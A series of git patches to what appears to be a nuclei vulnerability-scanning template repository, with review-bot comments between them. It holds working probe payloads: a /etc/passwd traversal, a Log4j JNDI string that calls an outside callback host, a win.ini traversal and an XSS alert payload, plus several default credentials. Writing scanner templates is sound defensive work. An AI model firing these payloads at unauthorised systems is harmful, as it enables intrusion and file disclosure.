+ - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
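Review bot: The template's `id: boa-web-fileRead` does not match its filename `boa-web-fileread.yaml`, and the file is created at the repository root rather than under a category directory like the other templates in this series (`cves/...`, `vulnerabilities/...`); the id should be `id: boa-web-fileread` and the file moved alongside its peers. The references cite CVE-2017-9833 but the template carries no `classification:` block with a `cve-id`, and the `tags:` line lacks `cve,cve2017`, so the usual CVE filtering will miss it. Given the CVE reference, the template may belong in `cves/2017/CVE-2017-9833.yaml` with the id to match, in line with how CVE-2020-15050 is laid out later in this series.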
From 1b814c3d0796c55749e4fe5bbdabc3c268093f4d Mon Sep 17 00:00:00 2001
From: Surya <65324191+bughuntersurya@users.noreply.github.com>
Date: Mon, 7 Mar 2022 04:43:20 -0500
Subject: [PATCH 047/259] Create vrealize-operations-tenant-app-log4j-rce.yaml
---
...alize-operations-tenant-app-log4j-rce.yaml | 41 +++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100644 vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
diff --git a/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml b/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
new file mode 100644
index 0000000000..247b36f8e0
--- /dev/null
+++ b/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
@@ -0,0 +1,41 @@
+id: vrealize-operations-tenant-app-log4j-rce
+
+info:
+ name: vRealize Operations Tenant App Log4j JNDI RCE
+ author: bughuntersurya
+ severity: critical
+ description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted vRealize Operations Tenant Application.
+ metadata:
+ shodan-query: http.title:"vRealize Operations Tenant App"
+ tags: rce,log4j,vmware,vrealize
+
+requests:
+ - raw:
+ - |
+ POST /suite-api/api/auth/token/acquire HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Origin: {{RootURL}}
+ Referer: {{RootURL}}/ui/
+
+
+ {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns" # Confirms the DNS Interaction
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+
+ extractors:
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
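Review bot: The description names CVE-2021-44228 but the template has no `classification:` block carrying `cve-id: CVE-2021-44228`, and the `tags:` line omits `cve,cve2021` as well as `oast`, which the other interactsh-based template in this series (gitlab-rce) includes; this remains the case after the rename in patch 048. Adding `classification:` with `cve-id: CVE-2021-44228` and extending the tags to `tags: cve,cve2021,rce,log4j,vmware,vrealize,oast` would let CVE- and OAST-based filtering find the template. The regex used by the matcher and the extractor is duplicated verbatim on two lines; that is conventional in these templates but worth keeping in sync if either is edited.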
From ac26863c5dd234b0d302ad645fca947979c63707 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Mon, 7 Mar 2022 15:46:57 +0530
Subject: [PATCH 048/259] template id/name update
---
...-app-log4j-rce.yaml => vrealize-operations-log4j-rce.yaml} | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
rename vulnerabilities/vmware/{vrealize-operations-tenant-app-log4j-rce.yaml => vrealize-operations-log4j-rce.yaml} (92%)
diff --git a/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
similarity index 92%
rename from vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
rename to vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
index 247b36f8e0..d6f307af86 100644
--- a/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
+++ b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
@@ -1,10 +1,11 @@
-id: vrealize-operations-tenant-app-log4j-rce
+id: vrealize-operations-log4j-rce
info:
name: vRealize Operations Tenant App Log4j JNDI RCE
author: bughuntersurya
severity: critical
description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted vRealize Operations Tenant Application.
+ reference: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
metadata:
shodan-query: http.title:"vRealize Operations Tenant App"
tags: rce,log4j,vmware,vrealize
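Review bot: The added `reference:` is written as a single plain scalar, whereas the other templates in this series declare references as a sequence even when there is only one entry; for consistency and so reference-iterating tooling sees a list, write it as `reference:` followed by `- https://www.vmware.com/security/advisories/VMSA-2021-0028.html`. The renamed id is fine, but the `name:` still says "Tenant App" while the id was generalised to `vrealize-operations-log4j-rce`; if the template is meant to cover more than the tenant app, the name and the shodan query should say so.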
@@ -17,7 +18,6 @@ requests:
Content-Type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/ui/
-
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
From ba14674e227590ca3af0dfce761759ecc6703ac9 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Mon, 7 Mar 2022 19:19:01 +0900
Subject: [PATCH 049/259] Create CVE-2020-15050.yaml
An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
Signed-off-by: GwanYeong Kim
---
cves/2020/CVE-2020-15050.yaml | 29 +++++++++++++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 cves/2020/CVE-2020-15050.yaml
diff --git a/cves/2020/CVE-2020-15050.yaml b/cves/2020/CVE-2020-15050.yaml
new file mode 100644
index 0000000000..3fc4b0f9ba
--- /dev/null
+++ b/cves/2020/CVE-2020-15050.yaml
@@ -0,0 +1,29 @@
+id: CVE-2020-15050
+
+info:
+ name: Suprema BioStar2 - Local File Inclusion (LFI)
+ author: gy741
+ severity: high
+ description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
+ reference:
+ - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-15050
+ tags: cve,cve2020,lfi,suprema,biostar2
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.50
+ cve-id: CVE-2020-15050
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/../../../../../../../../../../../../windows/win.in"
+
+ matchers:
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
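Review bot: The classification block is internally inconsistent: the vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` scores 9.8, not the `cvss-score: 7.50` given next to it, and the template's `severity: high` and the file-read description both correspond to a confidentiality-only impact, so the vector is most likely the one that is wrong (`C:H/I:N/A:N` yields 7.5). Separately, the requested path ends in `win.in` while the matcher words (`bit app support`, `fonts`, `extensions`) are section names from `win.ini`; unless the truncated name is intentional, the matcher can never fire and the check is silently dead, so the intended filename should be confirmed.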
From 04767227cc0c87d70145fcd5e05799409aa45ac4 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 7 Mar 2022 10:19:16 +0000
Subject: [PATCH 050/259] Auto Generated New Template Addition List [Mon Mar 7
10:19:16 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 69fc1c8a35..2e4fbaa088 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,2 +1,3 @@
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
+vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
From 4266bdad252aa8eb9f6a2de006df1afd4a1625a5 Mon Sep 17 00:00:00 2001
From: sullo
Date: Mon, 7 Mar 2022 09:08:43 -0500
Subject: [PATCH 051/259] Spacing
---
cves/2021/CVE-2021-40868.yaml | 3 ++-
cves/2021/CVE-2021-40870.yaml | 2 +-
cves/2021/CVE-2021-40978.yaml | 2 +-
default-logins/apache/tomcat-default-login.yaml | 2 +-
default-logins/dell/emcecom-default-login.yaml | 2 +-
default-logins/dvwa/dvwa-default-login.yaml | 2 +-
default-logins/exacqvision/exacqvision-default-login.yaml | 2 +-
default-logins/flir/flir-default-login.yaml | 2 +-
default-logins/frps/frp-default-login.yaml | 2 +-
default-logins/gitlab/gitlab-weak-login.yaml | 2 +-
10 files changed, 11 insertions(+), 10 deletions(-)
diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml
index 681c7f8d84..8c04b9dcd5 100644
--- a/cves/2021/CVE-2021-40868.yaml
+++ b/cves/2021/CVE-2021-40868.yaml
@@ -5,7 +5,8 @@ info:
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
- remediation: Upgrade to Cloudron 6.3 or higher.
+:q
+ remediation: Upgrade to Cloudron 6.3 or higher.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
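Review bot: The line `:q` added at column 0 between `description:` and `remediation:` is a stray editor command, not YAML, and it will make the template fail to parse (a top-level plain scalar with no value indicator inside the `info` mapping); it must be deleted so only the re-indented `remediation:` line remains. The diffstat for this file ("3 ++-") confirms an extra insertion beyond the whitespace fix the commit describes.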
diff --git a/cves/2021/CVE-2021-40870.yaml b/cves/2021/CVE-2021-40870.yaml
index 71abc2a141..f8348f548b 100644
--- a/cves/2021/CVE-2021-40870.yaml
+++ b/cves/2021/CVE-2021-40870.yaml
@@ -1,7 +1,7 @@
id: CVE-2021-40870
info:
- name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
+ name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
author: pikpikcu
severity: critical
description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml
index 157e96c654..d04f5ff2e6 100644
--- a/cves/2021/CVE-2021-40978.yaml
+++ b/cves/2021/CVE-2021-40978.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/nisdn/CVE-2021-40978
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
tags: cve,cve2021,mkdocs,lfi
- description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
+ description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml
index 1f69e7a798..79fc207a12 100644
--- a/default-logins/apache/tomcat-default-login.yaml
+++ b/default-logins/apache/tomcat-default-login.yaml
@@ -2,7 +2,7 @@ id: tomcat-default-login
info:
name: ApahceTomcat Manager Default Login
author: pdteam
- description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
+ description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
severity: high
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml
index 702fcf9b62..1ad75f5e1f 100644
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: Dell EMC ECOM Default Login
author: Techryptic (@Tech)
severity: high
- description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
+ description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP.
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
index 4ade6498f5..d73d47e498 100644
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: DVWA Default Login
author: pdteam
severity: critical
- description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
+ description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
tags: dvwa,default-login
reference:
- https://opensourcelibs.com/lib/dvwa
diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml
index fa13193ef8..f21f95842a 100644
--- a/default-logins/exacqvision/exacqvision-default-login.yaml
+++ b/default-logins/exacqvision/exacqvision-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: ExacqVision Default Login
author: ELSFA7110
severity: high
- description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
+ description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
tags: exacqvision,default-login
reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
classification:
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 74645c8686..8ded74e2f8 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: Flir Default Login
author: pikpikcu
severity: medium
- description: Flir default login credentials (admin/admin) were discovered.
+ description: Flir default login credentials (admin/admin) were discovered.
reference:
- https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml
index 86875c9a39..0402c27460 100644
--- a/default-logins/frps/frp-default-login.yaml
+++ b/default-logins/frps/frp-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: FRP Default Login
author: pikpikcu
severity: high
- description: FRP default login credentials were discovered.
+ description: FRP default login credentials were discovered.
tags: frp,default-login
reference: https://github.com/fatedier/frp/issues/1840
classification:
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index 199f3f00ae..1c7aad6898 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -4,7 +4,7 @@ info:
name: Gitlab Default Login
author: Suman_Kar,dwisiswant0
severity: high
- description: Gitlab default login credentials were discovered.
+ description: Gitlab default login credentials were discovered.
tags: gitlab,default-login
reference:
- https://twitter.com/0xmahmoudJo0/status/1467394090685943809
From c002e6c7d5cae3f5bf788d2c6095c72daa1c03be Mon Sep 17 00:00:00 2001
From: sullo
Date: Mon, 7 Mar 2022 09:13:57 -0500
Subject: [PATCH 052/259] Accidentally added a vim command
---
cves/2021/CVE-2021-40868.yaml | 1 -
1 file changed, 1 deletion(-)
diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml
index 8c04b9dcd5..ffe1fcb3e5 100644
--- a/cves/2021/CVE-2021-40868.yaml
+++ b/cves/2021/CVE-2021-40868.yaml
@@ -5,7 +5,6 @@ info:
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
-:q
remediation: Upgrade to Cloudron 6.3 or higher.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
From d58cf407d90bd0fd11c8f9bf77e1bcd16607f9d0 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 10:36:19 -0500
Subject: [PATCH 053/259] Enhancement: cves/2021/CVE-2021-41293.yaml by mp
---
cves/2021/CVE-2021-41293.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml
index 8a45fb3d51..ec610f0255 100644
--- a/cves/2021/CVE-2021-41293.yaml
+++ b/cves/2021/CVE-2021-41293.yaml
@@ -1,11 +1,12 @@
id: CVE-2021-41293
info:
- name: ECOA Building Automation System - LFD
+ name: ECOA Building Automation System - Local File Disclosure
author: 0x_Akoko
severity: high
- description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
+ description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41293
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
tags: cve,cve2021,ecoa,lfi,disclosure
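Review bot: The rewritten `description:` line uses "disclose" twice in the same sentence ("disclose arbitrary files ... and disclose sensitive and system information"), which reads as a copy-edit slip rather than two distinct impacts. A tighter line that keeps the same facts: `description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can read arbitrary files on the affected device and disclose sensitive system information.` The rest of the template (requests, matchers) is outside this hunk.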
@@ -33,3 +34,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/07
From 3ed70c862788d163d75dbc2d5c8d322b2a4c33ed Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 10:43:02 -0500
Subject: [PATCH 054/259] Enhancement: cves/2021/CVE-2021-41349.yaml by mp
---
cves/2021/CVE-2021-41349.yaml | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml
index 225d1a6a33..a05acc45dc 100644
--- a/cves/2021/CVE-2021-41349.yaml
+++ b/cves/2021/CVE-2021-41349.yaml
@@ -1,12 +1,13 @@
id: CVE-2021-41349
info:
- name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange
+ name: Pre-Auth POST Based Reflected Cross-Site Scripting in Microsoft Exchange
author: rootxharsh,iamnoooob
severity: medium
tags: cve,cve2021,xss,microsoft,exchange
- description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305.
+ description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. This CVE ID is unique from CVE-2021-42305.
reference:
+ - https://www.microsoft.com/en-us/download/details.aspx?id=103643
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
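Review bot: The new `name:` calls this a pre-auth reflected cross-site scripting issue while the new `description:` on the next changed line calls it a spoofing vulnerability, so the two fields now disagree about what the template detects; the description appears to repeat the vendor's advisory title rather than describe the finding. Suggest aligning them, e.g. `description: Microsoft Exchange Server contains a pre-authentication reflected cross-site scripting vulnerability (classified by the vendor as spoofing). This CVE ID is unique from CVE-2021-42305.` PATCH 058 rewrites the same two lines again and keeps the mismatch, so the fix applies there too. The matcher section of this file is outside the hunk.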
@@ -39,4 +40,6 @@ requests:
- type: status
status:
- - 500
\ No newline at end of file
+ - 500
+
+# Enhanced by mp on 2022/03/07
From 49623611cbeec409b12fd866f722aa4b27ab9543 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 10:46:28 -0500
Subject: [PATCH 055/259] Enhancement: cves/2021/CVE-2021-41381.yaml by mp
---
cves/2021/CVE-2021-41381.yaml | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-41381.yaml b/cves/2021/CVE-2021-41381.yaml
index ff9081fb62..7df1244e77 100644
--- a/cves/2021/CVE-2021-41381.yaml
+++ b/cves/2021/CVE-2021-41381.yaml
@@ -4,7 +4,7 @@ info:
name: Payara Micro Community 5.2021.6 Directory Traversal
author: pikpikcu
severity: medium
- description: Payara Micro Community 5.2021.6 and below allows Directory Traversal
+ description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
@@ -28,3 +28,5 @@ requests:
- "payara.security.openid.sessionScopedConfiguration=true"
condition: and
part: body
+
+# Enhanced by mp on 2022/03/07
From 78bcf4c56f530e3432bda6b8c6d656e8212ccd43 Mon Sep 17 00:00:00 2001
From: Davy Jones
Date: Mon, 7 Mar 2022 21:59:37 +0600
Subject: [PATCH 056/259] Added CMS Kentico Login Page Detection
---
exposed-panels/kentico-login.yaml | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 exposed-panels/kentico-login.yaml
diff --git a/exposed-panels/kentico-login.yaml b/exposed-panels/kentico-login.yaml
new file mode 100644
index 0000000000..0911e767d4
--- /dev/null
+++ b/exposed-panels/kentico-login.yaml
@@ -0,0 +1,24 @@
+id: Kentico-login
+
+info:
+ name: Kentico Login Page Detection
+ author: d4vy
+ severity: info
+ tags: panel, login, kentico
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Admin/CMSAdministration.aspx"
+ - "{{BaseURL}}/CMSPages/logon.aspx?ReturnUrl=%2fAdmin%2fCMSAdministration.aspx"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'action="./logon.aspx?ReturnUrl=%2fAdmin%2fCMSAdministration.aspx"'
+
+ - type: status
+ status:
+ - 200
From 74a69107bb265a212a7f14a6d68a627622171729 Mon Sep 17 00:00:00 2001
From: edoardottt
Date: Mon, 7 Mar 2022 19:19:41 +0100
Subject: [PATCH 057/259] Add CVE-2022-0381
---
cves/2022/CVE-2022-0381.yaml | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 cves/2022/CVE-2022-0381.yaml
diff --git a/cves/2022/CVE-2022-0381.yaml b/cves/2022/CVE-2022-0381.yaml
new file mode 100644
index 0000000000..e4c75198fc
--- /dev/null
+++ b/cves/2022/CVE-2022-0381.yaml
@@ -0,0 +1,32 @@
+id: CVE-2022-0381
+
+info:
+ name: WordPress Plugin Embed Swagger 1.0.0 - Reflected XSS
+ author: edoardottt
+ severity: medium
+ description: The Embed Swagger WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file which allows attackers to inject arbitrary web scripts onto the page, in versions up to and including 1.0.0.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-0381
+ cwe-id: CWE-79
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0381
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0381
+ tags: cve,cve2022,swagger,xss,wordpress
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "url: \"xss://\"-alert(document.domain)"
\ No newline at end of file
From 042d3eb4a4ef8b631852c4632f5896ab88fb6f17 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 13:40:20 -0500
Subject: [PATCH 058/259] Enhancement: cves/2021/CVE-2021-41349.yaml by mp
---
cves/2021/CVE-2021-41349.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml
index a05acc45dc..44aaad9bee 100644
--- a/cves/2021/CVE-2021-41349.yaml
+++ b/cves/2021/CVE-2021-41349.yaml
@@ -1,11 +1,11 @@
id: CVE-2021-41349
info:
- name: Pre-Auth POST Based Reflected Cross-Site Scripting in Microsoft Exchange
+ name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
author: rootxharsh,iamnoooob
severity: medium
tags: cve,cve2021,xss,microsoft,exchange
- description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. This CVE ID is unique from CVE-2021-42305.
+ description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
reference:
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
From 7f5de64a291aaba34fd0e548b16eadcc96ef010c Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 13:41:37 -0500
Subject: [PATCH 059/259] Enhancement: cves/2021/CVE-2021-41467.yaml by mp
---
cves/2021/CVE-2021-41467.yaml | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-41467.yaml b/cves/2021/CVE-2021-41467.yaml
index 67ba68c3a7..3bb1e8ed25 100644
--- a/cves/2021/CVE-2021-41467.yaml
+++ b/cves/2021/CVE-2021-41467.yaml
@@ -1,13 +1,13 @@
id: CVE-2021-41467
info:
- name: JustWriting - Reflected XSS
+ name: JustWriting - Reflected Cross-Site Scripting
author: madrobot
severity: medium
- description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
+ description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
reference:
- https://github.com/hjue/JustWriting/issues/106
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41467
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
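Review bot: The rewritten `description:` has a subject-verb disagreement: "A cross-site scripting vulnerability ... in JustWriting 1.0.0 and below allow remote attackers" should be `allows`, since the subject is the singular "vulnerability". Proposed line: `description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allows remote attackers to inject arbitrary web script or HTML via the challenge parameter.` The classification block continues past the end of this hunk.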
@@ -36,3 +36,5 @@ requests:
words:
- "text/html"
part: header
+
+# Enhanced by mp on 2022/03/07
From 138142bdba0738872959eb3ef654d2ca6556fb5e Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 13:45:31 -0500
Subject: [PATCH 060/259] Enhancement: cves/2021/CVE-2021-41648.yaml by mp
---
cves/2021/CVE-2021-41648.yaml | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41648.yaml
index 58f28013b0..2708382c24 100644
--- a/cves/2021/CVE-2021-41648.yaml
+++ b/cves/2021/CVE-2021-41648.yaml
@@ -1,11 +1,14 @@
id: CVE-2021-41648
info:
- name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php
+ name: PuneethReddyHC action.php SQL Injection
author: daffainfo
severity: high
- description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
- reference: https://github.com/MobiusBinary/CVE-2021-41648
+ description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.
+ reference:
+ - https://github.com/MobiusBinary/CVE-2021-41648
+ - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
